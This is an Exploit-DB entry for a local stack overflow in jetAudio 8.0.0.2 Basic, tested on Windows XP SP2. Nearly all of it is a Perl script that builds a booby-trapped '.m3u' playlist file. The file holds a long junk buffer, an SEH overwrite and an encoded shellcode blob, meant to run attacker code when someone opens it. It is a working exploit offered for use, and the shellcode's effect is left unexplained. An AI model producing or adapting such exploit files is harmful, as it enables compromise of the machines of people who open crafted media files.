jetAudio 8.0.0.2 Basic - '.m3u' Local Stack Overflow

EDB-ID:

11208

CVE:

N/A

Author:

cr4wl3r

Type:

local

Platform:

Windows

Published:

2010-01-21

#!/usr/bin/perl
# Title: jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit
# Author: cr4wl3r <cr4wl3r[!]linuxmail.org>
# Tested: Windows xp(sp2)
#########################################

my $file="b00m.m3u";

my $header = "http://";
my $junk = "A" x 1017;
my $nseh = "\xeb\x06\x90\x90";  
my $seh = pack('V',0x01221045); 

my $shellcode = 
"\x33\xC9\x83\xE9\xB0\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13".
"\xA8\x45\xF5\xB8\x83\xEB\xFC\xE2\xF4\x54\x2F\x1E\xF5\x40\xBC".
"\x0A\x47\x57\x25\x7E\xD4\x8C\x61\x7E\xFD\x94\xCE\x89\xBD\xD0".
"\x44\x1A\x33\xE7\x5D\x7E\xE7\x88\x44\x1E\xF1\x23\x71\x7E\xB9".
"\x46\x74\x35\x21\x04\xC1\x35\xCC\xAF\x84\x3F\xB5\xA9\x87\x1E".
"\x4C\x93\x11\xD1\x90\xDD\xA0\x7E\xE7\x8C\x44\x1E\xDE\x23\x49".
"\xBE\x33\xF7\x59\xF4\x53\xAB\x69\x7E\x31\xC4\x61\xE9\xD9\x6B".
"\x74\x2E\xDC\x23\x06\xC5\x33\xE8\x49\x7E\xC8\xB4\xE8\x7E\xF8".
"\xA0\x1B\x9D\x36\xE6\x4B\x19\xE8\x57\x93\x93\xEB\xCE\x2D\xC6".
"\x8A\xC0\x32\x86\x8A\xF7\x11\x0A\x68\xC0\x8E\x18\x44\x93\x15".
"\x0A\x6E\xF7\xCC\x10\xDE\x29\xA8\xFD\xBA\xFD\x2F\xF7\x47\x78".
"\x2D\x2C\xB1\x5D\xE8\xA2\x47\x7E\x16\xA6\xEB\xFB\x16\xB6\xEB".
"\xEB\x16\x0A\x68\xCE\x2D\x35\xB8\xCE\x16\x7C\x59\x3D\x2D\x51".
"\xA2\xD8\x82\xA2\x47\x7E\x2F\xE5\xE9\xFD\xBA\x25\xD0\x0C\xE8".
"\xDB\x51\xFF\xBA\x23\xEB\xFD\xBA\x25\xD0\x4D\x0C\x73\xF1\xFF".
"\xBA\x23\xE8\xFC\x11\xA0\x47\x78\xD6\x9D\x5F\xD1\x83\x8C\xEF".
"\x57\x93\xA0\x47\x78\x23\x9F\xDC\xCE\x2D\x96\xD5\x21\xA0\x9F".
"\xE8\xF1\x6C\x39\x31\x4F\x2F\xB1\x31\x4A\x74\x35\x4B\x02\xBB".
"\xB7\x95\x56\x07\xD9\x2B\x25\x3F\xCD\x13\x03\xEE\x9D\xCA\x56".
"\xF6\xE3\x47\xDD\x01\x0A\x6E\xF3\x12\xA7\xE9\xF9\x14\x9F\xB9".
"\xF9\x14\xA0\xE9\x57\x95\x9D\x15\x71\x40\x3B\xEB\x57\x93\x9F".
"\x47\x57\x72\x0A\x68\x23\x12\x09\x3B\x6C\x21\x0A\x6E\xFA\xBA".
"\x25\xD0\x47\x8B\x15\xD8\xFB\xBA\x23\x47\x78\x45\xF5\xB8";


my $footer="E" x (2000-length(junk.nseh.seh.shellcode));

my $payload = $header.$junk.$nseh.$seh.$shellcode.$footer;

print " Writing payload to file\n";

open(sploitf,">$file");
print sploitf $payload;
close(sploitf);
print " Exploit file " . b00m . " created\n";
print " b00m " . length($payload) . " bytes\n";